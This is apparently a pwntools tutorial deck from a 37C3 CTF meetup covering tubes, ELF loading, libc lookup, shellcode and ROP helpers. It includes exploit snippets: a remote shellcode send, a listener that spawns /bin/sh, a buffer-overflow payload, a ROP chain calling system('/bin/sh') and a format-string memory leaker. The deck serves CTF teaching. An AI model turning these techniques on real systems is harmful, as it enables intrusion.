![logo](./logo.png)

# PWNing Meetup \#2

### \#37C3

Arusekk & Peace-Maker

# What's pwntools?

- CTF framework and exploit development library
- make exploit writing as simple as possible
- https://pwntools.com & https://docs.pwntools.com
- grown from collection of tools by pwnies.dk and Samurai in 2012

```python
from pwn import *

context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()
```

# Usage modes

|pwn|pwnlib|
|----|----|
| toolbox | library |
| changes terminal settings | does nothing special |
| parses special CLI arguments | |



# Basics: Tubes

- Write once, run against everything
- Common interface for interacting with data

- `process`, `remote`, `ssh`, `serialtube`

In [1]:
from pwn import *
io = process(['echo', 'hi'])
io.recvline()

[x] Starting local process '/usr/bin/echo'
[+] Starting local process '/usr/bin/echo': pid 17261
[*] Process '/usr/bin/echo' stopped with exit code 0 (pid 17261)


b'hi\n'

In [2]:
context.timeout = 1

# Basics: Receiving

In [3]:
io = process(['ls', '-l', '/'])
io.recvline()

[x] Starting local process '/usr/bin/ls'
[+] Starting local process '/usr/bin/ls': pid 17262
[*] Process '/usr/bin/ls' stopped with exit code 0 (pid 17262)


b'total 876\n'

In [4]:
io.recvn(10)

b'drwxr-xr-x'

In [5]:
io.recvuntil(b'bin')

b'   3 root  root    4096 Mar 14  2023 Docker\nlrwxrwxrwx   1 root  root       7 Apr 23  2020 bin'

In [6]:
io.recvregex(br'\s+([0-9]+)', capture=True).group(1)

b'2'

In [7]:
# io.recvline().decode()
io.recvlineS()

' root  root    4096 Apr 23  2020 boot\n'

In [8]:
io.recvpred(lambda p: p.count(b'o') == 2)

b'drwx------   2 roo'

In [9]:
# unpack(io.recvn(context.bytes))
hex(io.unpack())

'0x72202074'

In [10]:
# u64(io.recvn(8))
hex(io.u64())

'0x3420202020746f6f'

In [11]:
io.recvline_startswith(b'lrwxrwxrwx')

b'lrwxrwxrwx   1 root  root       7 Apr 23  2020 lib -> usr/lib'

# Basics: Sending

In [12]:
io = process('cat')
io.send(b'CTF0')
io.recv()

[x] Starting local process '/usr/bin/cat'
[+] Starting local process '/usr/bin/cat': pid 17263


b'CTF0'

In [ ]:
io.sendline(b'thing')
io.recv()

b'thing\n'

In [14]:
io.newline = b'\r\n'
io.sendline(b'thong')
io.recv()

b'thong\r\n'

# Basics: Sending 🤩

In [15]:
io.send(b'stuff serving as marker')
# recvuntil + send
io.sendafter(b'marker', b'behind marker') # sendlineafter

b'stuff serving as marker'

In [16]:
# send + recvuntil
io.sendthen(b'back', b'echo back all of this please') # sendlinethen

b'behind markerecho back'

In [17]:
# io.send(p64(0xdeadf00dcafebabe))
io.p64(0xdeadf00dcafebabe)

In [18]:
# io.send(flat({4: b'hi'}))
io.flat({4: b'hi'})

# Remote interaction
## Connecting somewhere
```python
# TCP
tcp4 = remote('127.0.0.1', 1337)

# UDP
udp4 = remote('127.0.0.1', 1337, typ='udp')

# TLS
tls4 = remote('google.com', 443, ssl=True)

# IPv6
tcp6 = remote('google.com', 80, fam='ipv6')
```

# Remote interaction
## Listen servers
```python
# Wait for single connection
client = listen(1337).wait_for_connection()

# Port forwarding
listen(1337).wait_for_connection().connect_both(remote('google.com', 80))

# Reverse shell
listen(1337).spawn_process('/bin/sh')

# Accept multiple connections
s = server(1337)
client = s.next_connection()

# With a prompt
cb = lambda io: io.sendline(b'Welcome!')
s = server(1337, callback=cb)
client = s.next_connection()
```

# Custom transport layer

- easy to implement own socket types on top of `tube`
- implement `recv_raw` and `send_raw`

In [19]:
t = tube()
t.recv_raw = lambda n: b'lots of data'
t.send_raw = lambda d: print(f'{d!r}')

print(t.recvuntil(b'of'))
t.sendline(b'hi')

b'lots of'
b'hi\n'


# Random helpers

In [20]:
# Hex encode / decode
unhex(enhex(b'AAAA')) # bytes.fromhex(b'AAAA'.hex())

b'AAAA'

In [21]:
# Base64 encode / decode
b64d(b64e(b'BBBB')) # import base64; base64.b64decode(base64.encode(b'BBBB'))

b'BBBB'

In [22]:
# URL encoding
urlencode('?thing=asd') # urldecode as well

'%3f%74%68%69%6e%67%3d%61%73%64'

In [23]:
write('./thing', b'important') # open('./thing', 'w').write(b'important')
read('./thing')                # open('./thing', 'rb').read()

b'important'

# Random helpers

In [24]:
# Evaluate python expression safely
safeeval.expr('1 + 1')

2

In [25]:
# Evaluate python expression using defined variables
safeeval.values('CTF + 20', {'CTF': 22})

42

In [26]:
# Random string
randoms(16)

'xfpmtktypmghasyi'

In [27]:
# XOR multiple things
xor(b'ABCDABCD', 5, b'XYZ')

b'\x1c\x1e\x1c\x19\x1d\x1d\x1e\x18'

# Context

- thread-safe nesting context
- controls default values of lots of modules

adb, adb_host, adb_port, arch, aslr, binary, bits, buffer_size, bytes, cache_dir, cache_dir_base, cyclic_alphabet, cyclic_size, delete_corefiles, device, endian, gdbinit, kernel, log_console, log_file, log_level, newline, noptrace, os, proxy, quiet, randomize, rename_corefiles, signed, silent, terminal, timeout, verbose

In [28]:
context.arch = 'amd64'
context.log_level = 'error'
context.update(arch='amd64', os='linux')
    
# Infer from binary
context.clear()
context.binary = './chall'

with context.quiet:
    log.info('hi')
with context.local(log_level='info'):
    log.debug('ho')

[*] '/mnt/c/Users/Jannik/Downloads/ctfs/pwntools_tips/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    SHSTK:    Enabled
    IBT:      Enabled


# Context
- most API accept context settings through kwargs

In [29]:
print(context.os)
@LocalContext
def myfunc():
    print(context.os)
myfunc(os='windows')
print(context.os)

linux
windows
linux


# Exploit template

- Generate exploit boilerplate code
- Switch between remote and local target
    - `./doit.py`
    - `./doit.py LOCAL`
- Start a debug session
    - `./doit.py LOCAL GDB`

`pwn template --host the.c.tf --port 1337 ./chall > doit.py`

- **new**: omit `./chall` for auto-detection

`pwn template --host the.c.tf --port 1337 --libc libc.so.6 ./chall > doit.py`


# Running the exploit

- Control `context` through arguments:
    - `./doit.py NOASLR LOG_LEVEL=error`
- Control `context` through environment variables:
    - `PWNLIB_NOASLR=1 PWNLIB_LOG_LEVEL=error ./exploit.py`
- Access uppercase arguments through `args`
    - `./doit.py TEAM=ctf0` -> `args.TEAM == 'ctf0'`
- Control logging
    - `doit.py LOG_LEVEL=warn` -> `context.log_level = 'warn'`
    - `doit.py DEBUG` -> `context.log_level = 'debug'`
    - `doit.py SILENT` -> `context.log_level = 'error'`
    - `doit.py STDERR` -> sends logging to stderr instead of stdout
    - `doit.py LOG_FILE=./log.txt` -> write log to file
- Run with local system libc
    - `./doit.py LOCAL LOCAL_LIBC`

# ELF

In [31]:
exe = ELF('./chall')

In [32]:
hex(exe.sym.main) # exe.symbols['main']

'0x401210'

In [33]:
exe.address = 0x99000000
hex(exe.sym.main)

'0x99001210'

In [34]:

io = exe.process()
io.close()

[x] Starting local process '/mnt/c/Users/Jannik/Downloads/ctfs/pwntools_tips/chall'
[+] Starting local process '/mnt/c/Users/Jannik/Downloads/ctfs/pwntools_tips/chall': pid 17264
[*] Stopped process '/mnt/c/Users/Jannik/Downloads/ctfs/pwntools_tips/chall' (pid 17264)


# ELF - Debugging

```python
# Start in debugger (using gdbserver)
io = exe.debug() # gdb.debug(exe.path)

# Attach to running process
io = exe.process()
gdb.attach(io)

# Attach to local listening process
io = remote('localhost', 1337)
gdb.attach(io)

# Interact with debugger
with exe.debug(api=True) as io:
    io.gdb.Breakpoint('puts', temporary=True)
    io.gdb.continue_and_wait()

    text_ptr = io.gdb.parse_and_eval('$rdi').cast(gdb.lookup_type('int'))
    text = io.gdb.selected_inferior().read_memory(text_ptr, 20)

    print(text)

    io.gdb.quit()
```

# ELF - coredumps

```python
exe = ELF('./chall')
io = exe.process()

# crash the process
io.sendline(cyclic(256))
# wait until the process terminated
io.poll()

# lookup core dump
core = io.corefile

# access value of rip in core file
payload = flat({
    cyclic_find(core.rip): exe.symbols.win
})
# core.fault_addr or core.signal available

io = exe.process()
io.sendline(payload)
io.interactive()
```

# ELF - libc

In [37]:
context.clear()
context.timeout = 1
context.binary = './chall'

```python
libc = exe.libc
```

```
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    SHSTK:    Enabled
    IBT:      Enabled
```

```python
# Find return address from `main`
hex(libc.libc_start_main_return)
```

```
0x24083
```

# LIBCDB

- interface with https://libc.rip/ and https://gitlab.com/libcdb/libcdb
- `libcdb` module as well as command line tool

```
$ libcdb file /lib/x86_64-linux-gnu/libc.so.6
[*] libc.so.6
    Version:     2.31
    BuildID:     1878e6b475720c7c51969e69ab2d276fae6d1dee
    MD5:         5898fac5d2680d0d8fefdadd632b7188
    SHA1:        1430c57bf7ca6bd7f84a11c2cb7580fc39da07f5
    SHA256:      80378c2017456829f32645e6a8f33b4c40c8efa87db7e8c931a229afa7bf6712
    Symbols:
        __libc_start_main_ret = 0x24083
                         dup2 = 0x10e8c0
                       printf = 0x61c90
                         puts = 0x84420
                         read = 0x10dfc0
                   str_bin_sh = 0x1b45bd
                       system = 0x52290
                        write = 0x10e060
```

# LIBCDB commandline

- lookup by buildid
    - `libcdb hash 1878e6b475720c7c51969e69ab2d276fae6d1dee`
- lookup by id
    - `libcdb hash -t id libc6_2.31-0ubuntu9.9_amd64`
- lookup by leaked offsets
    - `libcdb lookup printf c90 system 0x52290`
- download matching libc
    - `libcdb hash -t id --download-libc libc6_2.31-0ubuntu9.9_amd64`
- unstrip / add back debug symbols
    - `libcdb file --unstrip libc.so.6`

# LIBCDB module

```python
# Download libc and return path to it
libcdb.search_by_build_id('1878e6b475720c7c51969e69ab2d276fae6d1dee', unstrip=True)

# Unstrip any binary in place
libcdb.unstrip_libc('./libc.so.6')
```

## Lookup by leaked function offsets
- with interactive prompt on multiple matches

```python
libc = ELF(libcdb.search_by_symbol_offsets({'puts': puts_leak, 'printf': printf_leak}))
```

# Assembly / Disassembly

- shortcut for binutils
- cross-architecture
- **shellcraft** - shellcode templates

In [38]:
asm('mov rax, 1; syscall')

b'H\xc7\xc0\x01\x00\x00\x00\x0f\x05'

In [40]:
asm('push 0x41414141; lea edi, [esp+0x10]', os='linux', arch='i386', bits='32')

b'hAAAA\x8d|$\x10'

In [47]:
asm('ldr x1, [x2]', arch='arm64')

b'A\x00@\xf9'

In [49]:
print(disasm(asm('mov rax, 1; syscall')))

   0:   48 c7 c0 01 00 00 00    mov    rax, 0x1
   7:   0f 05                   syscall


# Shellcraft

- (mostly) null-byte and newline free shellcode
- generated dynamically for real values at runtime
- uses mako template engine

In [54]:
print(shellcraft.linux.dupio())

    /* dup() file descriptor rbp into stdin/stdout/stderr */
    mov rdi, rbp
    push 2
    pop rsi
loop_1:
    /* dup2(fd='rdi', fd2='rsi') */
    /* setregs noop */
    /* call dup2() */
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    dec rsi
    jns loop_1



# ROP

- based on ROPgadget

In [41]:
exe = ELF('./chall', checksec=False)
rop = ROP(exe)

# set registers
rop.rdi = 5
# multiple at once
rop(rsi=0x41414141, r15=0xcafe)

print(rop.dump())

[*] Loading gadgets for '/mnt/c/Users/Jannik/Downloads/ctfs/pwntools_tips/chall'
0x0000:         0x4013a3 pop rdi; ret
0x0008:              0x5
0x0010:         0x4013a1 pop rsi; pop r15; ret
0x0018:       0x41414141
0x0020:           0xcafe


In [42]:
# Lookup gadgets as attributes
rop.rsi_r15

Gadget(0x4013a1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0x18)

# ROP

In [45]:
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')

In [46]:
rop = ROP([exe, libc])

# manual call
rop.call(0xaaaaaa, [1234, 5678])

# shorthand
rop.system(next(exe.libc.search(b'/bin/sh')))

print(rop.dump())

[*] Loading gadgets for '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
0x0000:         0x4013a3 pop rdi; ret
0x0008:            0x4d2 [arg0] rdi = 1234
0x0010:          0x2601f pop rsi; ret
0x0018:           0x162e [arg1] rsi = 5678
0x0020:         0xaaaaaa
0x0028:         0x4013a3 pop rdi; ret
0x0030:         0x1b45bd [arg0] rdi = 1787325
0x0038:          0x52290 system


# Memory leaker

```python
pwnlib.memleak.MemLeak(f, search_range=20, reraise=True, relative=False)
```

- Caches leaked data
- Tries surrounding address if leak failed

```python
@MemLeak
def leaker(addr):
    to_leak = p64(addr)
    if b'\n' in to_leak:
        return None
    io.sendlineafter(b'> ', b'%08$7xAA' + to_leak)
    return unhex(io.recvuntil(b'AA', drop=True))

# leak from starting address
leaker(0x4000102)
# leak an address range
leaker[0x4000102:0x4000112]
# unpack right away
leaker.u64(exe.got.puts)
```

![logo](./logo.png)

# PWNing Meetup #2

![logo](./pwntools_discord.png)